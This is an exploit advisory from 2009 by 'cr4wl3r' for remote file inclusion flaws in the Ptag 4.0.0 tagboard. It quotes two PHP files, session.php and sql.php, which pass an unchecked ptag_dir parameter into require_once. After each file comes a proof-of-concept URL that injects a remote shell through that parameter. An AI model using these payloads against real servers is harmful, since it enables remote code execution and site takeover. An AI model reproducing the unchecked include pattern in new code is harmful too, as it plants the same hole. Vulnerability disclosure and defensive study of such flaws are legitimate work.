66 lines
No EOL
1.7 KiB
Text
66 lines
No EOL
1.7 KiB
Text
##################################################################
|
|
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ##
|
|
## Date: 19-12-2009 ##
|
|
## Author: cr4wl3r ##
|
|
## Software Link: http://sourceforge.net/projects/ptag/ ##
|
|
## Version: N/A ##
|
|
## Tested on: GNU/LINUX ##
|
|
##################################################################
|
|
|
|
|
|
~ Code [session.php]
|
|
|
|
<?php
|
|
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
|
|
//Session handling File
|
|
|
|
require_once(ptag_dir."lib/php/crossSession.php");
|
|
class ptag_session extends crossSession{
|
|
public function __construct(){
|
|
global $ptag_sql;
|
|
$this -> sql_table = ptag_prefix."session";
|
|
$this -> cookie_name = ptag_prefix."session";
|
|
|
|
//If RSS mode, switch session to non-viewed tracker.
|
|
if (ptag_output == "rss"){
|
|
parent::__construct($ptag_sql, sha1(""));
|
|
}
|
|
else{
|
|
parent::__construct($ptag_sql);
|
|
}
|
|
}
|
|
}
|
|
?>
|
|
|
|
~ PoC
|
|
|
|
[Ptag_path]/lib/session.php?ptag_dir=[Shell]
|
|
|
|
|
|
|
|
|
|
~ Code [sql.php]
|
|
|
|
<?php
|
|
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
|
|
//Extending MySQL class
|
|
|
|
require_once(ptag_dir."lib/php/ezmySQL.php");
|
|
class ptag_sql extends ezmySQL{
|
|
|
|
public function __construct(){
|
|
parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);
|
|
}
|
|
|
|
protected function error_handler($err){
|
|
$error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];
|
|
|
|
return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);
|
|
}
|
|
}
|
|
?>
|
|
|
|
|
|
~ PoC
|
|
|
|
[Ptag_path]/lib/sql.php?ptag_dir=[Shell] |